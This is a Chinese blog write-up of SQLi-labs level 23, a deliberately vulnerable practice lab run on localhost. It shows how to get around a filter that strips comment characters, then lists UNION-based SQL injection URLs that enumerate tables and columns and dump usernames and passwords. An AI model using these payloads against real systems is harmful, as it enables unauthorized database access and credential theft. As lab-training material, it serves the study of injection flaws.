SQLI-labs-第二十三关

最新推荐文章于 2024-06-12 15:28:19 发布

賺钱娶甜甜

最新推荐文章于 2024-06-12 15:28:19 发布

阅读量767

点赞数 18

分类专栏：渗透学习之路文章标签：数据库 web安全

本文链接：https://blog.csdn.net/weixin_54055099/article/details/139128351

版权

渗透学习之路专栏收录该内容

21 篇文章 0 订阅

订阅专栏

第二十三关

6、使用group_concat() 和concat_ws()

知识点：注释符过滤绕过

思路：

分析源码可知，使用了preg_replace()函数过滤了注释符，该函数的用法如下图

那么我们就考虑绕过过滤，意味着我们不能使用注释符，查询网上，可以用 and ’1‘=’1 进行绕过

1、判断注入点

首先正常输入，看看回显

加入单引号

数据库语句报错，根据报错信息，我们可以得知数据库的语句后面有limit 0,1

根据源码，现在的数据库语句是这样的

SELECT * FROM users WHERE id='1‘' LIMIT 0,1

加入注释符

http://127.0.0.1:3306/Less-23/?id=1' --+

还是报错，说明注释符没用

使用 1’ and '1'='1 进行绕过

http://127.0.0.1:3306/Less-23/?id=1' and '1'='1

数据正常回显

http://127.0.0.1:3306/Less-23/?id=1' and '1'='2

数据没有正常回显，因为是and 两边都是真才会回显数据

说明目前可以绕过注释符过滤

拼接后的数据库语句是这样的

SELECT * FROM users WHERE id='1' and '1'='1' LIMIT 0,1

判断字段数

这里使用order by 语句没有作用，不知道为什么，只能使用union 语句

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,3,4 and '1'='1

说明当前的字段数没超过4

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,3 and '1'='1

说明当前有三个字段，为什么是?id=-1 呢？因为使用union语句，当前一句数据库语句没有结果，才会执行union 后面的查询语句（两个 sql 语句进行联合操作时，当前一个语句选择的内容为空，我们这里就将后面的语句的内容显示出来）

这里我们知道原本数据库的闭合方式是怎样的，那一定需要and 1=1吗？

http://127.0.0.1:3306/Less-23/?id=1''

拼接后的数据库语句

SELECT * FROM users WHERE id='1''' LIMIT 0,1

这样的闭合方式是正常的，我们不一定要用and '1'='1 ，在单引号的中间使用union语句也可以进行绕过

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,3 '

注意：id=-1是为了使union语句的左边执行结果为空，才可以执行右边的语句

到这里，我们就知道，目前存在单引号的闭合问题，且注释符被过滤

2、判断数据库

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,database() '

3、判断表名

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) '

通过修改limit的值，可以得知表为 emails、referers、uagents、users

4、判断字段名

以users表为例

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) '

通过修改limit的值，可以知道三个字段为：id、username、password

5、获取数据库的信息

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,(select username from security.users limit 0,1) '

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,(select password from security.users limit 0,1) '

通过修改limit的值，就可以获取所有用户的信息

上面使用select 语句的

6、使用group_concat() 和concat_ws()

具体可以参考：SQLI-labs-第一关_1.完成字符型注入 sqli-labs 第一关的攻击-CSDN博客

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

http://127.0.0.1:3306/Less-23/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' '